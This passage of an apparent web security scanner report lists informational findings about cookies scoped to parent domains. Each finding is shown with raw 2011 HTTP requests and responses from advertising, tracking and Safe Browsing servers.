P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.971432.797434.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 01:53:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 687
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 01:53:07 GMT
Connection: close
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 01:53:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : igougo_300X250_ATF | http:\/\/www.igougo.com | 300 x 250 Medium Rectangle | Advertising.com - Indirect -->\r\n<script type="text\/javascript">\r\n
...[SNIP]...

13.113. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:15 GMT
Connection: close
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:12:16 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mn
...[SNIP]...

13.114. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Date: Mon, 03 Oct 2011 00:09:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mn
...[SNIP]...

13.115. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.915323.812164.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 595
Date: Mon, 03 Oct 2011 00:09:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000812164/mnum=0000
...[SNIP]...

13.116. http://rs.gwallet.com/r1/pixel/x1743

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1743

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x1743 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_oo=1; ra1_uid=4711648038188259648

Response

HTTP/1.1 200 OK
Content-Length: 140
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Mon, 01-Oct-2012 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=DDX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sun, 02-Oct-2016 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://bh.contextweb.com/bh/set.aspx?action=clr&advid=3420&token=RORO1" width="1" height="1" border="0"></body></html>

13.117. http://rs.gwallet.com/r1/pixel/x914r7675757

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x914r7675757

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x914r7675757 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/ROne/ro_x914.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 248
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Tue, 02-Oct-2012 01:52:56 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=FDX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Mon, 03-Oct-2016 01:52:56 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><!-- PubMatic- Exclude user - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MiZjb2RlPTIwNTQmdGw9NTE4NDAw
' width='1' height
...[SNIP]...

13.118. http://safebrowsing.clients.google.com/safebrowsing/downloads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=14.0.835.187&pver=2.2&wrkey=AKEgNitErWf0UFLnRnw3Az6mp57JIWbOiz4iR9gNFsjxTOQfoHIRqIpBEuaneWSYfX0d7kUgr1D2W0FMpF_cHSqPs9XEwGa4Xg== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 195
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch

goog-malware-shavar;a:37678-51238:s:50280-62140:mac
goog-phish-shavar;a:154883-165954:s:77359-81359:mac
goog-badbinurl-shavar;a:137-2537:s:61-2536:mac
goog-badbin-digestvar;a:19-1911:s:3-397:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=3dfb46e0dc07a7d7:TM=1317604332:LM=1317604332:S=S2Ouy3CEy9MxV-6M; expires=Wed, 02-Oct-2013 01:12:12 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:12:12 GMT
Server: Chunked Update Server
Content-Length: 686
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Expires: Mon, 03 Oct 2011 01:12:12 GMT
Cache-Control: private

m:Tr-1oiyw-IJER2A0oBF6b_mKSpU=
n:1890
i:goog-badbin-digestvar
i:goog-badbinurl-shavar
i:goog-malware-shavar
u:safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYveUDINDlAyoH
...[SNIP]...

13.119. http://sales.liveperson.net/hc/15744040/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/15744040/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/15744040/?&site=15744040&cmd=mTagKnockPage&lpCallId=482200729660-510428063105&protV=20&lpjson=1&id=2559909213&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotel-obtz3-english%7ClpMTagConfig.db3%7ClpButtonDiv3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1317600745459; expires=Tue, 04-Oct-2011 00:12:25 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 03 Oct 2011 00:12:25 GMT
Set-Cookie: HumanClickSiteContainerID_15744040=STANDALONE; path=/hc/15744040
Set-Cookie: LivePersonID=-5110247826455-1317600658:-1:1317600658:-1:-1; expires=Tue, 02-Oct-2012 00:12:25 GMT; path=/hc/15744040; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1510

lpConnLib.Process({"ResultSet": {"lpCallId":"482200729660-510428063105","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

13.120. http://servedby.flashtalking.com/click/1/16628

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /click/1/16628

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/1/16628;183799;231524;211;162480/?g=1343AC00FD7B0F&random=1244&ft_sgid=542&url=http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)"

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:58:02 GMT
Cache-Control: no-cache, no-store
Content-Length: 0
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Via: 1.1 sjc005200 (MII-APC/2.1)
Content-Type: text/plain


13.121. http://servedby.flashtalking.com/imp/1/16628

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:2-t:13702351)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:53:28 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 02 Oct 2011 23:53:28 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 582


var ftGUID_183799="1343AC00FD7B0F";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;li
...[SNIP]...

13.122. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&prevkadIds=21557&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.igougo.com/about/&frameName=http_www_igougo_comaboutkomli_ads_frame22662026621&kltstamp=2011-9-2%2020%3A53%3A2&ranreq=0.7874341141432524&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x39&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBMDCID=1; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
